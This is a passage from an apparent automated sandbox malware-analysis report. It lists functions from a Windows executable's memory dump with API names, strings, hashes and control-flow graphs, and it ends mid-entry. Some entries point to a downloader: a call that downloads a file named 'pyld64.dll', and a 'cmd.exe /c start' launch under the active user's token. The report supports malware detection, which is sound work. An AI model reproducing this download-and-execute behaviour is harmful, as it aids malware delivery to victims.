                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 3251591375-0
                          • Opcode ID: 06dcafce427ad2013d2a2520821c7d367541db3bd139956188ba7abefa0f1ead
                          • Instruction ID: 60e872e363df591e5919c620e1d79802bb1405ce97649271f3e5eb7af2601bb5
                          • Opcode Fuzzy Hash: 06dcafce427ad2013d2a2520821c7d367541db3bd139956188ba7abefa0f1ead
                          • Instruction Fuzzy Hash: E0315E21E0D24785FA54BBA8A4653F9A3D1BF41389F445435EA0DCB6D3DE2FA404D711
                          Function 00007FF646E642A0 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Process$CurrentExitTerminate
                          • String ID:
                          • API String ID: 1703294689-0
                          • Opcode ID: 482119c73dbecc6f01a2d13653977d386b4c4b43497574547c26fc4dc47e9c88
                          • Instruction ID: ede2c42ce1a52dd4fe7caf9c72b0602a36d7b22da925b759eb2b651afcc02f68
                          • Opcode Fuzzy Hash: 482119c73dbecc6f01a2d13653977d386b4c4b43497574547c26fc4dc47e9c88
                          • Instruction Fuzzy Hash: 83D09214B1C716C2EA483B706C9907993E17F5970AF106438C94FC7353CE2E680D4340
                          Function 00007FF646E582D0 Relevance: 3.8, APIs: 3, Instructions: 76sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 206 7ff646e582d0-7ff646e58301 call 7ff646e56270 209 7ff646e58303 206->209 210 7ff646e58335-7ff646e58349 206->210 209->210 212 7ff646e58305-7ff646e5831f 209->212 211 7ff646e58350-7ff646e58362 call 7ff646e56270 210->211 218 7ff646e583d6-7ff646e583ea 211->218 219 7ff646e58364-7ff646e5836e 211->219 214 7ff646e58332 212->214 215 7ff646e58321-7ff646e5832b 212->215 214->210 215->214 217 7ff646e5832d-7ff646e58330 215->217 217->210 219->218 220 7ff646e58370-7ff646e58379 219->220 221 7ff646e5837b-7ff646e58396 Sleep 220->221 222 7ff646e58398 220->222 221->211 223 7ff646e5839a-7ff646e583a6 Sleep 222->223 224 7ff646e583a8-7ff646e583c6 222->224 223->211 225 7ff646e583ca-7ff646e583d1 Sleep SleepEx 224->225 226 7ff646e583c8 224->226 225->218 226->225
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID:
                          • API String ID: 3472027048-0
                          • Opcode ID: b3bccc84b5a53fe13569b691800b4932c2f92312b8723106b8d147b73f53ef98
                          • Instruction ID: 469bdbde8e072a980469caf19a17a064d54da3ca85922b04ff2ea832fa939da7
                          • Opcode Fuzzy Hash: b3bccc84b5a53fe13569b691800b4932c2f92312b8723106b8d147b73f53ef98
                          • Instruction Fuzzy Hash: D6212761B1E35A82EF18BA99A41417FD2D2BF94BC0F088835DE5E8B7D5DD2EE4028300
                          Function 00007FF646E68D24 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID: AppPolicyGetProcessTerminationMethod
                          • API String ID: 544645111-2031265017
                          • Opcode ID: 6af6a1df756a290feac13a9209535a663cea78d8fa153c011f8c399839e9a381
                          • Instruction ID: 995eb6247d74b83ed156c7e0809d713a8312f3bacb1fb7dd1ba599bdaaaf54a4
                          • Opcode Fuzzy Hash: 6af6a1df756a290feac13a9209535a663cea78d8fa153c011f8c399839e9a381
                          • Instruction Fuzzy Hash: C911D321B1C24A92EB28BB52A844576A2A1BF547B4F941730EE3C833D5DF3DE55AC700
                          Function 00007FF646E641B6 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: HandleModule$AddressFreeLibraryProc
                          • String ID:
                          • API String ID: 3947729631-0
                          • Opcode ID: e056150dbe5959c1b29f5827ea7c57a5328476036038a9b8cb92d07f986d9151
                          • Instruction ID: baeb3340f34fd5d6d120734e9300f62a0c4b52968e1fb286b88b68d8cefad995
                          • Opcode Fuzzy Hash: e056150dbe5959c1b29f5827ea7c57a5328476036038a9b8cb92d07f986d9151
                          • Instruction Fuzzy Hash: 58214B32A0CB02C9EB60BFA4A4842BD67E4FB44718FA4A635D71D83AD5DF399485C740
                          Function 00007FF646E6E56C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: f8cff0e8c4024e7c5cf76d3b39f39904047d97a4f545cc4d771e468e82e3c5dd
                          • Instruction ID: 276c741c9467666df1e0da8cd8af62305569577d3ee84082cff3e38b9fd74001
                          • Opcode Fuzzy Hash: f8cff0e8c4024e7c5cf76d3b39f39904047d97a4f545cc4d771e468e82e3c5dd
                          • Instruction Fuzzy Hash: 03116A32A1C65286F314BB14A54047DF6E5FF80780F952534E75DC7AD2EE7EE8518B40
                          Function 00007FF646E6E474 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00007FF646E677C0: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF646E672A7), ref: 00007FF646E67815
                          • InitializeCriticalSectionEx.KERNEL32(?,?,00000000,00007FF646E6E775,?,?,00000000,?,?,00007FF646E7216C), ref: 00007FF646E6E4BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AllocateCriticalHeapInitializeSection
                          • String ID:
                          • API String ID: 2575566380-0
                          • Opcode ID: 80ea160bcd2fd8f54d9b585bad03042cea780f9ebc800eefabf6074e49d7f9d3
                          • Instruction ID: f09344ab802aecc5a464b9c6a54b7f3b2af7b302f16f904e3ecaff82586455f9
                          • Opcode Fuzzy Hash: 80ea160bcd2fd8f54d9b585bad03042cea780f9ebc800eefabf6074e49d7f9d3
                          • Instruction Fuzzy Hash: C511CE3272C79186E614AB25D14016EA7A4FB44BA0FA89635E76E83BC5CF39E463C700
                          Function 00007FF646E677C0 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 657c6c69694bc854a6e6eb44efcb9fa31419599763e11a255899f3767d97c627
                          • Instruction ID: 6c3185ca743a45c4d8b9cb8dbfa0f6672bca64b5bff9e982ddc77781b101e6e6
                          • Opcode Fuzzy Hash: 657c6c69694bc854a6e6eb44efcb9fa31419599763e11a255899f3767d97c627
                          • Instruction Fuzzy Hash: E9F04950F0D21281FE54B76194113B592D17F84B81F9C3430CA1EC66E2EE1EE8808250
                          Function 00007FF646E674CC Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: __vcrt_uninitialize_ptd
                          • String ID:
                          • API String ID: 1180542099-0
                          • Opcode ID: 36d84cb366b0d31bca4bff76c8ee4973f053fbe9bd1cf199c60f4096a849ec9b
                          • Instruction ID: a3b697c751fea54b8dfb4a6989dc8c6a43b7d75fb2634952eb5b3eeef8634a89
                          • Opcode Fuzzy Hash: 36d84cb366b0d31bca4bff76c8ee4973f053fbe9bd1cf199c60f4096a849ec9b
                          • Instruction Fuzzy Hash: 40E04620D1D24380FE65BB3818462BA96D03F65310FE03A76E72DC22C2EF2F745A9621
                          Function 00007FF646E5B150 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF646E5B164
                            • Part of subcall function 00007FF646E5CCF0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF646E5CCF8
                            • Part of subcall function 00007FF646E5CCF0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF646E5CCFD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
                          • String ID:
                          • API String ID: 1208906642-0
                          • Opcode ID: 5c5b623771b2ec85650aaa776922176f21024c877756428bb6d45fbbbbfad373
                          • Instruction ID: effaaa26264020e671ad4b0d386fb3c5777617bb64e3f68a01f3a1f9e51f8795
                          • Opcode Fuzzy Hash: 5c5b623771b2ec85650aaa776922176f21024c877756428bb6d45fbbbbfad373
                          • Instruction Fuzzy Hash: 87E0E250E1D243D0FEA83AE516732BA96C53F65744F5014BCE92ECA2C39E0F304E6662
                          Function 00007FF646E69514 Relevance: 1.5, APIs: 1, Instructions: 11memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 343 7ff646e69514-7ff646e69543 VirtualProtect
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 771e0f3c09b906f71ded665401910e6f56f866ace11000d63700c01ec3f64d6d
                          • Instruction ID: 5cb156d151e9d4b7df8178f1133e4bbf39e429f47bce948ee9fd73c5df15c535
                          • Opcode Fuzzy Hash: 771e0f3c09b906f71ded665401910e6f56f866ace11000d63700c01ec3f64d6d
                          • Instruction Fuzzy Hash: 27D0C925B3D541C3E740BB11D8897A5A369B798711F804025E94AC2694DF7DC259CB10

                          Non-executed Functions

                          Function 00007FF646E58E3C Relevance: 27.2, APIs: 18, Instructions: 229fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
                          • String ID:
                          • API String ID: 2398595512-0
                          • Opcode ID: 149ecd05e269b5566a53e767e1482c91004895e9f8d851a993e908b7a1cf9dcf
                          • Instruction ID: 48923a3bec190bf852c687fb1a0392519cb2535d50a3e199a792e41eabd21673
                          • Opcode Fuzzy Hash: 149ecd05e269b5566a53e767e1482c91004895e9f8d851a993e908b7a1cf9dcf
                          • Instruction Fuzzy Hash: C291D231B0CA5286E774BB65A8042BAA3E0BF457B4F144734DA6EC76D1EF3EE8058700
                          Function 00007FF646E56D80 Relevance: 21.5, APIs: 8, Strings: 4, Instructions: 476filenetworkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CurrentDirectoryDownloadFile_invalid_parameter_noinfo_noreturn
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set${}\pyld64.dll
                          • API String ID: 473140952-662293507
                          • Opcode ID: 80d47b2e92a9ca075d771af39df049572f9ed0a37e079e4bba7d41141b3adeb0
                          • Instruction ID: 44a530a6070e21ca5690150c65f75f72879bfe408aea17206a9ce023dae5aa15
                          • Opcode Fuzzy Hash: 80d47b2e92a9ca075d771af39df049572f9ed0a37e079e4bba7d41141b3adeb0
                          • Instruction Fuzzy Hash: ED427322A1CBC640EB61F738E8443ABA7A0FB95360F444376D6ED866E6DF6DD145CB00
                          Function 00007FF646E47800 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123processCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CloseHandle$User$ActiveConsoleCreateProcessQuerySessionToken_invalid_parameter_noinfo_noreturn
                          • String ID: cmd.exe /c start "" "{}"
                          • API String ID: 3081551734-1675525727
                          • Opcode ID: 638af90035e60b4472c70caaa74f4bececc3157a80f3a5101178a3a1d03564c4
                          • Instruction ID: 1be056ddb86572bfd169894639a94c943ed6027c05a11bd461bedd5f1009fb47
                          • Opcode Fuzzy Hash: 638af90035e60b4472c70caaa74f4bececc3157a80f3a5101178a3a1d03564c4
                          • Instruction Fuzzy Hash: 7D516232E1CB818AE700AF75E8403ADB3F1FB99748F105225EB8C92A69DF79D195C740
                          Function 00007FF646E720DC Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                          • String ID:
                          • API String ID: 1617910340-0
                          • Opcode ID: 28158cdeaa84f42ab127868234f8a48a09de13adae3ee1d906704fc565d780cc
                          • Instruction ID: ad82d997240e7b99900461bf308cdf93cea27d9d6b16025fc970a09fdaed3e10
                          • Opcode Fuzzy Hash: 28158cdeaa84f42ab127868234f8a48a09de13adae3ee1d906704fc565d780cc
                          • Instruction Fuzzy Hash: 38C1B332B2CA428AEB10FF79C4802AC77A1FB49B98F115225DB1E97796DF3AD455C700
                          Function 00007FF646E705B0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
                          • String ID: utf8
                          • API String ID: 2487361160-905460609
                          • Opcode ID: 8518ae16cba9fef110025f42e30d7e11c41da75d22b966f6f320f54430d3ca03
                          • Instruction ID: 432c2b7b7cda69d987ec4be31aa773d794e38d858ad0600632b9995409517596
                          • Opcode Fuzzy Hash: 8518ae16cba9fef110025f42e30d7e11c41da75d22b966f6f320f54430d3ca03
                          • Instruction Fuzzy Hash: FD919E76A0C78285EB60BBA1D4506BAA3E1FF84B85F844135DF4C87B86EF3EE5558700
                          Function 00007FF646E5B800 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: bd9d23b13804ddfa70e3fdc804b5186687f88255e5b5e13a7b600eccfc791173
                          • Instruction ID: a5ab2c43459e2e9540b6c78d1930df272284d5824b13c479ca98556f115eef63
                          • Opcode Fuzzy Hash: bd9d23b13804ddfa70e3fdc804b5186687f88255e5b5e13a7b600eccfc791173
                          • Instruction Fuzzy Hash: E1313E7260DB81C5EB60BF60E8543EDB3A4FB44749F404039DA4D87B99DF39D5488710
                          Function 00007FF646E71010 Relevance: 9.2, APIs: 6, Instructions: 171COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Locale$InfoValid$CodeDefaultEnumLocalesPageSystemUser
                          • String ID:
                          • API String ID: 3082464267-0
                          • Opcode ID: 525b0c438fb4035c77fddbf3c0749051ca89bb88eca90a5a67994e4ef765752f
                          • Instruction ID: 303fe926aebaca0a0038c4c0e39fa0b2bdb1391f1c27a488d7f4a0df2d7f71b7
